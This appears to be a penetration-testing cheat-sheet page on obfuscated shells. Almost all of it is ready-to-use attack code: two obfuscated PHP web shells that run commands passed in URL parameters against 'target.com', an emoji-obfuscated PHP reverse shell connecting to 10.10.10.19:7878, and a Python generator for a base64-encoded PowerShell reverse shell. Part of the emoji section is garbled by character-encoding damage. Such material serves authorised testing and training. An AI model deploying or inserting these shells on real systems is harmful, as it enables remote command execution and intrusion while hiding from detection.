Obfuscated Shells
Web Shells
Obfuscated PHP
#Usage: http://target.com/path/to/shell.php?0=command
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
#Usage: http://target.com/path/to/shell.php?_=function&__=argument
#Example: http://target.com/path/to/shell.php?_=system&__=ls
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Reverse Shells
Emoji PHP
php -r '$π="1";$π="2";$π
="3";$π="4";$π="5";$π="6";$π="7";$π="8";$π="9";$π="0";$π€’=" ";$π€="<";$π€ =">";$π±="-";$π΅="&";$π€©="i";$π€=".";$π€¨="/";$π₯°="a";$π="b";$πΆ="i";$π="h";$π="c";$π€£="d";$π="e";$π="f";$π="k";$π="n";$π="o";$π="p";$π€="s";$π="x";$π = $π. $π€. $π. $π. $π. $π. $π. $π. $π;$π = "10.10.10.19";$π» = 7878;$π = "sh". $π€’. $π±. $π€©. $π€’. $π€. $π΅. $π
. $π€’. $π€ . $π΅. $π
. $π€’. $π. $π€ . $π΅. $π
;$π€£ = $π($π,$π»);$π½ = $π. $π. $π. $π;$π½($π);'
Powershell b64 encoded
#Execute in your linux to generate your Powershell Reverse Shell
python -c $'import base64; IP = "10.10.10.19"; PORT = "7878"; payload = \'$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\' % (IP, int(PORT)); print("powershell -e " + base64.b64encode(payload.encode("utf16")[2:]).decode());'
Last updated
Was this helpful?